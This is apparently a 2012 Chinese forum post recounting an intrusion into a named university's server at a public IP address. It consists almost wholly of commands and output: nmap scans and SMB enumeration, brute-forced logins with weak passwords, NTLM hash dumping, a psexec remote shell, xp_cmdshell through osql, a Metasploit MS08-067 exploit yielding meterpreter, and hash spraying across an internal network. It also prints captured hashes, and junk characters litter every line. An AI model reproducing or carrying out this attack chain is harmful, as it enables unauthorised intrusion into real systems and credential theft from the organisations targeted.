中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/
0 ?8 {( p0 ?3 O- j7 z' M) D  a* M( s
root@bt:~# nmap -sS -sV 202.103.242.241
1 Z' f" q; A4 p6 [  r5 i2 u# G* j4 Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
5 q! d# y1 N& ]8 P+ E' }9 S9 {- B9 a/ [: Q" V( n) q* h+ n! T
Nmap scan report for bogon (202.103.242.241)
7 {' x9 b* Y, u# q- \7 i0 R, h' E3 U( C1 q: w, n$ o% U7 K! n& Q
Host is up (0.00048s latency).
8 ]& n* F5 s& x2 u
7 R& i/ s- p6 U3 LNot shown: 993 closed ports
) i" |; H* n5 Y0 Y+ Z: T. z- r1 P, ?3 f# E
PORT     STATE SERVICE       VERSION" o: ~4 A6 `: M/ n8 |! [
' S2 B  S+ a- Z" l5 q
135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
) U' F7 N1 e. z/ [+ F1 X+ J7 m* f
6 u* ], h8 C8 @' o$ d% @139/tcp  open  netbios-ssn4 w6 L! C: r- m* f* f
7 M: h1 E. n# F% u) A
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
6 l: d# P2 J' u  ?+ h2 z
) E9 d$ R$ r' h  K3 w  H% a# `" }1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! i- K. h- }9 {& g3 e1 i! _
6 Y( N* O3 q- N5 Z
1026/tcp open  msrpc         Microsoft Windows RPC9 T& \/ c7 C. t! Q

8 U' g1 w. R+ E3372/tcp open  msdtc?
3 m) f& U$ e# I  G$ f7 {! z; ~5 f- C
: m; K8 q  C2 F8 h2 z% Y9 `) B3389/tcp open  ms-term-serv?
7 G: \' U& Z2 s  Y3 `5 c1 T0 A% M) E/ ?  X/ b3 u
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
/ d/ v6 Y: u: J; CSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
: T* Y& C# Y1 h7 y$ Y& E" D- S; D+ ?  E7 x6 K
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions% }6 z# k4 O( H0 D+ [' V1 ^

5 W* W. A; [% {; zSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 W" i6 |$ Y/ g- m! g- [+ h; F
6 T2 O( w6 ?8 m5 \SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO& M8 V8 Y/ j4 ~

  @1 W9 t! @- M( ]8 S+ M+ KSF:ptions,6,”hO\n\x000Z”);
# @+ \4 u: P) L0 Y0 ~/ ?! V
, o- k' v$ Q  g# {% jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- ^9 b( M0 g, R: f
- h+ E1 R/ Y) A: pService Info: OS: Windows* p9 Z) ]- j7 @- ~& ^% O9 q/ M
- n# |+ Z  X5 \' V" X  |" M! d
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ ." o" I/ I* e' \2 c
" `; M7 X1 m, S' I" L3 D
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds; h3 _" L) L( {5 ]' `" l3 O- X

# j2 b- Y+ q# ]/ L- c" proot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
# x+ B; h) B7 D# N; a, U+ W
# ]/ j, p! ^3 x! n; o4 Y. c! T-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse& M' j$ M  J% I5 J/ l

/ X8 \7 E  g" {) j" M% l9 D-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse3 F, N% X$ A8 l  B) [% M
: ~" j. p; v$ L1 ]" j+ U
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
8 i8 {0 E- \' E/ {/ k* s4 Y. Q% S0 \7 n2 f
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse% w( T3 y; M3 a2 x2 s3 g. `
! S- F: ~8 c6 R( E
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
' L2 R6 I6 M/ Z9 E9 L6 {& r) u9 L5 t' X6 a" J5 F  t
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse$ v+ W, ~) f* U' X
6 E' _" I& H7 N9 G
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse$ v4 t. h8 l( y! [

! x: L8 D0 ?8 S! n( h# O-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse+ @5 A0 w2 C$ b' O8 N. t" B
2 B2 R8 {9 ]; a) U) |3 Y
-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse5 n8 B0 `; f2 _
4 }7 o* |( ]4 T5 T9 G( e# J
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
9 k$ S* l0 D4 @: R# _
" f+ G6 `5 n8 g) v$ J5 C-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
- o  n. r4 \. C+ ?7 @/ H4 L9 r8 a% R! l
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
# J* ^4 V1 A) Q- i
! Z6 I7 V, _1 o% a/ S/ l0 V/ t) f-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse, k5 t, q, O2 i$ ?& g) r1 S& u
2 Q1 w( t, m) G, `$ Y3 I# e
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse9 h$ p! y1 s' q/ G5 K# q5 s

6 h- ^4 t" o1 k4 }# k/ T-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse2 e' o( p8 K( w6 b& e

' |1 ~# l0 B; U. q: froot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
& i" `- ^5 @& B: P8 A* \2 f; ~. r
/ N& m$ t# D" e* N7 U# T//此乃使用脚本扫描远程机器所存在的账户名; J: L5 w  S) f) F! u

( W- i  P9 b+ }& i8 N# c& TStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST. k1 K9 L+ R7 Q& j% Y
0 D2 y8 ~$ U+ a* ^! b4 G( s# J
Nmap scan report for bogon (202.103.242.241)
, _5 r! J8 V" f! t: R+ u' X& U: L
3 A/ Z8 K& Y/ y# P" z2 `Host is up (0.00038s latency).
, c" V  e! d2 C! ?' b) ~# }
* ]+ e4 b4 s2 w  D& ONot shown: 993 closed ports
' c6 `" i* a0 R* i: s! G7 B( A
, I% A, j2 m5 W0 ]) w9 IPORT     STATE SERVICE& l) s: e# v: n

# \& M  t) n* a) W9 S! M8 }135/tcp  open  msrpc
8 f( B. ?) x2 L& @" T% x/ O$ W$ s, V+ g7 R
139/tcp  open  netbios-ssn$ k' c/ c4 q( F/ h1 @; m
' m  e; t% C" j# T
445/tcp  open  microsoft-ds) x. Y, p2 O! r! k" L( U0 S9 s5 D2 o

$ e% |! T) ]! V! k+ k- X2 x1025/tcp open  NFS-or-IIS0 S2 ~: V, A6 z7 S# L

4 O+ |* Q% `  V  ?: {1026/tcp open  LSA-or-nterm
3 _) i2 z1 E2 M8 \! `# ~& M& \( x( X5 N% e; O% S  e* P
3372/tcp open  msdtc
8 P. Y0 e( E/ X9 _0 }2 e
/ t4 F7 U. Z5 I: V0 @4 M3389/tcp open  ms-term-serv
4 z3 J( u: m5 @
  \3 J: R5 b1 K2 x) b# O' aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* D- C5 v) a! t2 ]$ [7 L7 J. q% a3 M4 b' {$ ?) e- `* Z
Host script results:
) w: W7 L$ K+ l" X: m5 Q% E9 R, K1 P3 U
| smb-enum-users:
$ i. s" s" \6 f
' s& T" X& L' K) ]9 i  w. t0 O|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果3 ?# E& y  N$ L9 Z
6 Z* ]6 l5 @( s$ L) H
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds/ L& ]5 W  u' D* G8 g, _
3 L. w% F; L; O  x% `! v' `  q. u) ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
- H# ?/ p; G: V- y
* \9 C+ D2 S7 v) j" @: |0 Q0 U//查看共享
5 y7 ]' s3 U$ D* h, ]
& k! m8 ^% x# E/ VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
1 q8 k9 T' B/ T  _* \9 C) O
1 f4 D' B% }0 ^5 L- [$ I9 |Nmap scan report for bogon (202.103.242.241)
% K, {9 z' S# z+ i( Z5 B) O
9 Q  ~- T: a. O; C# lHost is up (0.00035s latency).3 W. U' S0 \- U- [8 I

; v5 v5 b0 O3 H& B* X; U/ QNot shown: 993 closed ports
, l% B5 b% h- p& A1 C1 y: x) B8 u7 M- v$ A
PORT     STATE SERVICE& b7 W" u* a2 t4 g2 U, ~6 [
  Z* t; y3 J. Q
135/tcp  open  msrpc
$ h  o8 l8 b1 h# {8 {. P2 `) [) {4 y; }1 m: ~+ u' q: a8 M
139/tcp  open  netbios-ssn# }3 i5 `8 I1 [# P7 K3 j  g& o$ U
2 M" S! ~( {1 Z2 {) O$ `
445/tcp  open  microsoft-ds
2 M: r- m/ z6 ]/ h0 K5 t6 o1 Z0 J5 T' C: v6 y. B, d! V
1025/tcp open  NFS-or-IIS& T* }; X1 j) D; F

$ F1 ?$ E* m1 L7 S2 p( C" z1026/tcp open  LSA-or-nterm
  E; h! }- A, a# m% ^3 M4 a9 j/ ]" O( [' U% Q5 q; @
3372/tcp open  msdtc# Q5 R3 z# D+ m, @9 F
* w* s6 f; ~0 }' S/ A" J7 V
3389/tcp open  ms-term-serv
$ D( ^& q  ~' ]4 u$ N# l* A/ \# Q5 B5 Y. l( b* C% a
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- y( g4 _) S; r8 i' T% J0 X: U, h0 i
& D- Z7 N- x! Z, E2 ?5 A
Host script results:
7 U9 ~  I) z$ n  Y: Y& ]1 X  {' b* R8 T! y! X
| smb-enum-shares:1 |; d, Z9 W2 G- T; R- n0 W

0 H; C) X1 x. J0 J1 y|   ADMIN$
5 x$ w' T+ v- {
5 n5 E! s' u. s3 R; \7 N1 W|     Anonymous access: <none>: D% {  X9 Y0 E( i) @- Z6 i

0 k4 t; l2 ~4 [|   C$3 h" S0 ]# @& G3 G
0 J/ `0 z# x& J& d1 c( b
|     Anonymous access: <none>7 {4 Y) f( C# \% B3 ?1 [% E

& z' L7 w- `/ E" y. U4 P|   IPC$& a3 Y# r$ M5 r0 E3 m4 a

7 o; R. B" `* H|_    Anonymous access: READ* ~8 B" Z  f5 u6 A0 r+ q/ }
. }; A' Q6 \: Q
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds+ F5 N; \' C$ I6 [9 ?1 k+ {

# V3 r2 h: w6 z2 H, Z1 s! q# e) h# p, kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
7 Q& ^) u+ F1 w: z7 K5 w9 C; |
! G/ ^; R% o+ h: m% H6 c  U5 {//获取用户密码
3 `  I0 ]" c# [- l- c
5 s! V" X  _8 f! Q. O# QStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST% T; b' l- B; f( |9 V6 n
/ ?; O& S  r2 Z4 o8 R& B. r
Nmap scan report for bogon (202.103.242.2418)
6 S$ v1 ]3 S" e5 U9 O& f* t7 q5 ]6 b" j
Host is up (0.00041s latency).) N* J' k) s7 r

* X7 O% a2 i5 vNot shown: 993 closed ports
4 p+ n2 }; J+ S6 ^' j- f1 B- g% S1 l
PORT     STATE SERVICE
$ i6 J9 s* u# ]8 o7 }- [
8 G7 D9 `: \! N( n/ H135/tcp  open  msrpc: p& P; o) `" ~& _0 w
1 V% p5 u4 {: F) i5 V& e4 W. X* ^. }! b
139/tcp  open  netbios-ssn
" @0 ?. _% y5 n% x9 z, q' s5 d$ v) y3 n3 G
445/tcp  open  microsoft-ds) Z/ q! h2 y+ s

  Q* V; L0 Q0 h0 m1025/tcp open  NFS-or-IIS4 _) z5 S( i) X. j! s6 j
# Y0 h' ~4 x  E  ?: g
1026/tcp open  LSA-or-nterm' y' A( ?/ Z  e

: m$ Z" a9 Y  O& J+ t8 c3372/tcp open  msdtc
5 S  P( H5 T! \: V; M( B, D5 }4 @
3389/tcp open  ms-term-serv
5 B! N: {+ v+ X) P8 q/ p, ?6 z
" \. e) V1 V5 M0 G) M9 HMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 B: }% s3 D; k! k+ t, t

; r9 m1 Z3 x" i# q7 LHost script results:. }/ d5 v2 U( H2 l2 @

& _9 C4 g, t7 W2 w6 C' q| smb-brute:
. a  D) C9 j8 D* I6 b4 O% Q$ U  R/ k& X* A4 ?! j& w! I& S( G/ _
administrator:<blank> => Login was successful4 G: ~5 l8 Q2 r2 b' \4 V$ P/ U
, s: E; I$ v" L; F. S' Y: ?# K1 B; {# f
|_  test:123456 => Login was successful
3 f" `( L8 ]6 r; b- W& Z* ?: M1 J% C" v8 d( [8 h" C
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds" u8 a' M, B! z8 p

. b4 G9 E6 Y/ jroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash7 F9 H5 r2 g' |

: }3 T" ]1 z3 `root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
4 d. H! d6 R0 m% I
9 |+ I3 w( l: }; mroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
/ b2 _3 x- ?3 [* l2 q
8 h7 \3 u, e6 `root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139. y- c$ I1 o4 b* V; _7 b8 a

' m( U# [8 @. P  z* b& ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST# T" x& {3 F/ K7 y* G

& A; A7 I& ~# q% F- _9 _" p1 T) qNmap scan report for bogon (202.103.242.241)6 m) \/ r; d8 O* c9 H: ^

; z2 S% |% v! E- m- GHost is up (0.0012s latency).
1 ]7 N3 Q2 z" V1 x; N# e- c
# W4 \' c$ S! a8 ?9 ]/ `" hPORT    STATE SERVICE/ W7 p, y& a8 P7 \

+ Z' B, @0 Q! @2 m135/tcp open  msrpc5 F% w% o1 S7 r9 a' A/ `$ [
0 j6 r, r2 C1 w5 h: t
139/tcp open  netbios-ssn1 ]; `7 a' x& ?  `/ V) u7 ~

0 `' D. s- J: B' ^" s" H445/tcp open  microsoft-ds- y; ^( S  R0 G% c; [, x! f  x6 Z

" L& e& D  C6 f. I; l! ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 S# p: [1 I' T) W9 {6 m
2 P7 [  h# O) T9 ~Host script results:5 [2 p  ?# H4 n2 a- q
+ k! ]2 A, k4 _# e* P; h
| smb-pwdump:0 n/ |) w. W) [1 B0 V& F. k

3 n& q: k! M+ b: }; K| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 l" ]5 w7 Y* S* E- l6 _3 E

4 R9 u7 Y7 r0 C. `- x. W  E| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************9 L. y9 |6 \! p7 {7 s7 R7 n  \

4 n( ^- J! M8 n- U, || test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4, X: z' \% h. I& L
, @, i+ B% U. h! D5 P+ k
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2( c/ ]& O  D" {% E
2 c  b1 O' s6 P" W4 V3 ?2 `
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
7 A: G& H) Q- c$ C1 K4 W- P# C" H+ U; b4 r1 a% y
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell) t5 o2 \, R" V& c8 ?
  f/ _7 `5 D$ q+ [$ l. }7 y
-p 123456 -e cmd.exe
) M$ A2 o5 U& D; S; ]  L# M* o- I3 H! g) z' I
PsExec v1.55 – Execute processes remotely
( Q. h: q6 i( |# E5 K
$ x5 u. i2 t4 y& V4 NCopyright (C) 2001-2004 Mark Russinovich8 \+ {+ |  b3 B2 w/ |/ \1 g
. B1 @  N$ a' U% A. s
Sysinternals – www.sysinternals.com
9 `# w1 p* @" D6 G9 g3 ~5 M3 U& ~# N  c
Microsoft Windows 2000 [Version 5.00.2195]
4 E- a5 s# K+ Z4 s
5 y7 x( U  ~8 I6 \' ~0 R. {2 b( u/ V(C) 版权所有 1985-2000 Microsoft Corp.2 c: z. X: t% ]! @! V) x2 b

  Q2 N- b3 b8 s+ ~& l; KC:\WINNT\system32>ipconfig
& N  G# Z5 l- M7 A: r
- G& Y0 X% I& K/ A' cWindows 2000 IP Configuration5 S- x1 [$ d5 M  g

, D3 y; [5 s( F' W2 fEthernet adapter 本地连接:
# m' h( {5 O# k% C: e9 `  n: d! x7 F* X+ \9 ~: i/ i, A
Connection-specific DNS Suffix  . :
6 E* p5 {" }2 d3 i6 _2 z
, r9 K9 [7 G% @& x  w$ t& EIP Address. . . . . . . . . . . . : 202.103.242.241# W: K" l8 Y. l4 E

' c- e: l9 S2 w. R3 y0 oSubnet Mask . . . . . . . . . . . : 255.255.255.0
: x: d" C( t7 _% Y) o; J: z1 |# u: }6 `; G6 @9 B, N
Default Gateway . . . . . . . . . : 202.103.1.1
9 |% z5 Z  S4 R8 N1 ?9 x& V7 B
3 }% s& i% u  v/ t3 sC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令( k8 j4 D- ^. j

& T0 p9 M& }8 groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
8 g( t' Y, @: E+ {- w) K0 B, w
1 e3 @/ i9 |3 `( `Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST6 V+ L: m) ^; F! @: x$ u

9 b+ L4 E! k* r6 l; a, E8 y" _Nmap scan report for bogon (202.103.242.241)
( i1 E, B- z0 b* k: Y8 u" Q8 h2 p- G5 `5 s& d9 E4 t) {
Host is up (0.00046s latency).! C9 ]( u/ T6 x( j* S9 n6 ^2 p" w

- t" D: R- y3 M# ]6 ^; r4 v0 A1 \Not shown: 993 closed ports3 k2 Y% F1 q8 w( w' U& g- ~% t. m
# @! O- O, Z/ h' P5 l" q1 v+ I
PORT     STATE SERVICE
  I( P( p1 _9 C$ c+ \5 F7 B$ d; f5 y9 q( Y2 r
135/tcp  open  msrpc
4 f2 u! y  Q) P9 d9 H( D* ]
8 T2 Z) Z, L9 Y/ K2 A' [: ]139/tcp  open  netbios-ssn
2 h  `- o- P3 n
  ?# M4 g1 d# \, c) X2 T# q0 w445/tcp  open  microsoft-ds7 u' w6 w6 ~1 O

* Y( s5 Y8 U$ O% K4 d1025/tcp open  NFS-or-IIS
( y$ x1 B7 e$ R$ V8 [) C# O
! ^) I3 R& r# j# q1 j$ u0 K; C9 N1026/tcp open  LSA-or-nterm4 J8 J3 l6 u8 \) j& W3 p9 z& {

; [* j$ R% z* ^: ~3372/tcp open  msdtc* Y: d4 u* U3 c
# D' Y, g. j" o
3389/tcp open  ms-term-serv* u3 L9 n  V) i4 f5 o9 O# q
9 o. _% t1 r7 B/ N, S; J
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): t0 `7 z6 T0 [7 d! ]& K. G
' b7 f7 A" K6 ?1 m0 T
Host script results:) \5 Y; J! f1 V, I. R! t
4 E2 a) r' f+ T  I( Y
| smb-check-vulns:" t2 @4 _4 D- K2 W
: l; g& z' c! ~1 Y9 h
|_  MS08-067: VULNERABLE
9 }. Q7 L7 s, e
( n( p# R( ~+ p/ p- i9 ?: c/ |Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds( h! H3 W( Z2 ?( ]9 A
- A! O9 m1 Y4 P- `% s, o& F9 Q
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出" F# k- l9 a$ y: ?  k# z/ Z; E- G* C

( r7 n3 g; V* Kmsf > search ms08
% y( \4 p) w8 S2 a& t# B
( S  |, c4 y% }* m& @4 [3 Zmsf > use exploit/windows/smb/ms08_067_netapi
! }- c9 u9 W; F0 `3 M
! o! y% H6 T- y( Ymsf  exploit(ms08_067_netapi) > show options! D4 d8 I/ K, g0 `/ L2 E& H

0 [+ a( G' X) ymsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 h% `6 r' A+ z
) \1 ~0 a0 S) m  `  d3 vmsf  exploit(ms08_067_netapi) > show payloads  P; Z$ `5 l1 a4 U: S( Q* s5 v
- |% u; ~# S+ @
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  D  K; k- N, g% Q9 t1 P8 L- e3 S
# V& `! S7 r: O) q- h6 Q$ emsf  exploit(ms08_067_netapi) > exploit
7 ~) a3 V8 Q* Z3 e% m
- v% N  N  {% `0 b* |. P5 [meterpreter >
; E1 j+ K8 h& G/ A
8 a! {2 E. K/ \: z9 _Background session 2? [y/N]  (ctrl+z)
' a. ^- n$ U( o: T0 e; s  ~; m/ k5 W* z0 T, T  W- `
msf  exploit(ms08_067_netapi) > sessions -l% W# t# o! O" i: P, u
( I# E; F) o. V2 n6 |+ Z
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
1 i9 j5 C/ M' N/ [% \1 ]9 ?( D  p- s+ M9 v3 U. W0 X
test
# b" Y# E( i* F% E0 T( ?8 d  A  C* F1 ]; r6 f6 S# t
administrator! C8 a4 h* i! d% L2 w

/ w- J) Z# K: K* broot@bt:/usr/local/share/nmap/scripts# vim password.txt( o6 R1 V0 l7 `2 \

8 s5 N8 F) v  k" _44EFCE164AB921CAAAD3B435B51404EE' \$ ]4 ^; Z" x. S5 X
5 w( ^6 |! `; v1 e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 6 q9 E3 U' a" h. T. `
: K4 ?2 y8 h, F
//利用用户名跟获取的hash尝试对整段内网进行登录+ i1 u7 r/ [% Q; m7 F

0 V  w. E+ R$ l' }Nmap scan report for 192.168.1.1055 u. S& n( u3 V$ H- y9 R

5 W) P! [) G. bHost is up (0.00088s latency).
+ N3 J, ?. G* f5 i
4 b5 L8 a3 W- F* s8 \Not shown: 993 closed ports
4 r' |- }. m& d9 L6 z% T/ M1 f2 {% P/ l9 {$ l
PORT     STATE SERVICE
  N% P/ I7 R5 q: `3 A4 T- Y; \
0 c. M% j+ Q1 i  o135/tcp  open  msrpc% P( m$ I" ]( Y0 @

& G" m% e" T& q- d  j# O139/tcp  open  netbios-ssn
1 P. U% ?( Z, K2 n! O' ^1 z1 }% U) ~2 J/ }# a: i+ N
445/tcp  open  microsoft-ds
" E9 S& T; `/ `% E- g$ v
( j9 v. n! ]: D1 V1025/tcp open  NFS-or-IIS4 X9 G, h9 P- j  [* M

9 z$ ^0 Q7 D, D" C1026/tcp open  LSA-or-nterm
5 ?* K6 Z7 O/ P6 l, _' n' z3 C5 N: U# K' ?8 ~; j
3372/tcp open  msdtc
9 o3 `" [3 `/ Y5 h6 r5 Q1 v: O8 Z: {- Q* S: I' q  Q3 J# k1 V
3389/tcp open  ms-term-serv
$ n" n8 \) h+ I# O+ |2 y' N' p. O7 w: S" L5 H- b5 k+ F6 u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% C0 K( ~$ u. O3 _  Y2 e( c7 d( `6 z; S; h8 m! V8 j
Host script results:( |- o. A8 W  x/ @* @
3 b, Q' i2 F# x9 k2 ]" c: r. I# ^
| smb-brute:6 ?  S$ G. ?/ {( D) |0 H0 F

- b4 [; J6 ^8 |/ z, G% k|_  administrator:<blank> => Login was successful
0 H; @# H3 V8 X& k$ `+ e- f7 A' k2 f: r6 v( r& Z! v
攻击成功,一个简单的msf+nmap攻击~~·: o& w& u; [" A/ a: ~+ ~$ M

# P3 c8 s3 f- l( t6 Z- \* H; V* |



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2